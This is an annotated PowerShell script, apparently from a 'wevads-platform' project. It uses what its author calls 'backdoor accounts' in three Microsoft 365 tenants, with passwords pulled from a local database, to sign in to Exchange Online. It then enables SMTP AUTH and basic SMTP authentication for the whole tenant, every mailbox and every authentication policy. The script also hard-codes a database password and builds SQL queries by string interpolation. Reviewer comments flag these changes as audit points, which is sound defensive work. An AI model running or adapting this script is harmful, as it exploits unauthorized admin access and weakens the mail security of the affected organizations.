wevads-platform/scripts/enable-smtp-auth-v2.ps1
2026-02-26 04:53:11 +01:00


#!/usr/bin/env pwsh
# Purpose (as visible in this file): for each of three hard-coded Microsoft 365
# tenants, read an administrator password from a local PostgreSQL table, sign in
# to Exchange Online with it, and re-enable SMTP client authentication
# (including basic auth for SMTP) at organization, mailbox and
# authentication-policy level.
#
# NOTE(review): every change below weakens the tenant's mail security posture,
# and the author's own comment describes the accounts as "backdoor accounts".
# For a tenant owner these are audit points: the Set-TransportConfig,
# Set-CASMailbox and Set-AuthenticationPolicy calls with these parameters are
# the changes to look for in the Exchange admin audit log (verify that auditing
# is enabled in the tenant).

# Non-terminating errors are reported but do not stop the script; only calls
# that pass -ErrorAction Stop reach the catch blocks.
$ErrorActionPreference = "Continue"
# NOTE(review): hard-coded database password, readable by anyone with access to
# this file and inherited by every child process through the environment. It
# should be treated as disclosed and rotated; a secret store or a protected
# password file belongs here instead.
$env:PGPASSWORD = "admin123"
# Test with known working backdoor accounts
# NOTE(review): three admin-named accounts in three different tenants. Accounts
# matching these addresses should be reviewed and removed by the tenant owners.
$testAccounts = @(
@{Email="sysadmin_5578@accoff03.onmicrosoft.com"; Tenant="accoff03.onmicrosoft.com"},
@{Email="sysadmin_1652@accoff05.onmicrosoft.com"; Tenant="accoff05.onmicrosoft.com"},
@{Email="sysadmin_8754@accoff04.onmicrosoft.com"; Tenant="accoff04.onmicrosoft.com"}
)
foreach ($acc in $testAccounts) {
$email = $acc.Email
$tenant = $acc.Tenant
# Get password from DB
# NOTE(review): the query is assembled by string interpolation. $email comes
# from the fixed list above here, but the pattern is injection-prone as soon as
# the value has another origin. The returned admin_password is used directly as
# the sign-in password below, so the table holds credentials in recoverable form.
$pwRaw = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_password FROM office_accounts WHERE admin_email = '$email' LIMIT 1"
# If psql printed nothing, $pwRaw is presumably $null and .Trim() raises an
# error outside the try block; the emptiness check on the next line then skips
# the account (confirm against an empty result).
$pw = $pwRaw.Trim()
if ([string]::IsNullOrWhiteSpace($pw)) { Write-Host "SKIP $email - no password"; continue }
Write-Host "=== $tenant via $email ==="
try {
# The cleartext password stays in $pw after this conversion; the SecureString
# only wraps a copy of it.
$secPwd = ConvertTo-SecureString $pw -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($email, $secPwd)
# Connect to Exchange
# NOTE(review): username/password sign-in; presumably these accounts are not
# subject to MFA - confirm in the tenant's sign-in logs.
Connect-ExchangeOnline -Credential $cred -ShowBanner:$false -ErrorAction Stop
# 1. Enable SMTP AUTH at org level
# Sets the organization-wide "SMTP client authentication disabled" switch to
# false, i.e. turns SMTP AUTH on for the whole tenant.
Set-TransportConfig -SmtpClientAuthenticationDisabled $false -ErrorAction Stop
Write-Host " Transport: SMTP AUTH enabled"
# 2. Enable SMTP AUTH on all mailboxes
# Applies the same override to every mailbox returned. Errors are silenced, so
# the count printed afterwards is the number of mailboxes retrieved, not the
# number actually changed.
$mbs = Get-CASMailbox -ResultSize Unlimited
foreach ($mb in $mbs) {
Set-CASMailbox -Identity $mb.Identity -SmtpClientAuthenticationDisabled $false -ErrorAction SilentlyContinue
}
Write-Host " Mailboxes: $($mbs.Count) configured"
# 3. Check Authentication Policy
# Despite the word "Check", this modifies every policy that blocks basic
# authentication for SMTP so that it allows it.
try {
$policies = Get-AuthenticationPolicy
foreach ($p in $policies) {
if ($p.AllowBasicAuthSmtp -eq $false) {
Set-AuthenticationPolicy -Identity $p.Name -AllowBasicAuthSmtp:$true -ErrorAction Stop
Write-Host " AuthPolicy: BasicAuthSmtp ENABLED on $($p.Name)"
}
}
# NOTE(review): Substring(0,60) throws when the message is shorter than 60
# characters; that exception would be raised inside this handler and is
# presumably caught by the outer catch. The outer handler bounds the length
# with [Math]::Min; this one does not.
} catch { Write-Host " AuthPolicy: $($_.Exception.Message.Substring(0,60))" }
# 4. Test SMTP from PS
# No SMTP test is performed in the visible code: the two queries below fetch an
# admin address and its password for the tenant, and only the address is
# printed. $mainPw is not used afterwards in this listing, so a second
# credential is pulled into memory for no visible purpose.
Write-Host " Testing SMTP for main admin..."
$mainAdmin = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_email FROM office_accounts WHERE tenant_domain = '$tenant' AND id < 100 LIMIT 1"
$mainPw = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_password FROM office_accounts WHERE tenant_domain = '$tenant' AND id < 100 LIMIT 1"
Write-Host " Main: $($mainAdmin.Trim())"
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
Write-Host " DONE"
}
catch {
# Prints at most the first 80 characters of the error and closes the session so
# the next tenant starts from a clean connection.
Write-Host " FAIL: $($_.Exception.Message.Substring(0, [Math]::Min(80, $_.Exception.Message.Length)))"
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
}
Write-Host ""
}
# NOTE(review): the next line is not PowerShell. It looks like the terminator
# of a shell here-document that wrapped this script, with the wrapper's opening
# line missing from this listing - confirm against the original file.
ENDSCRIPT 2>&1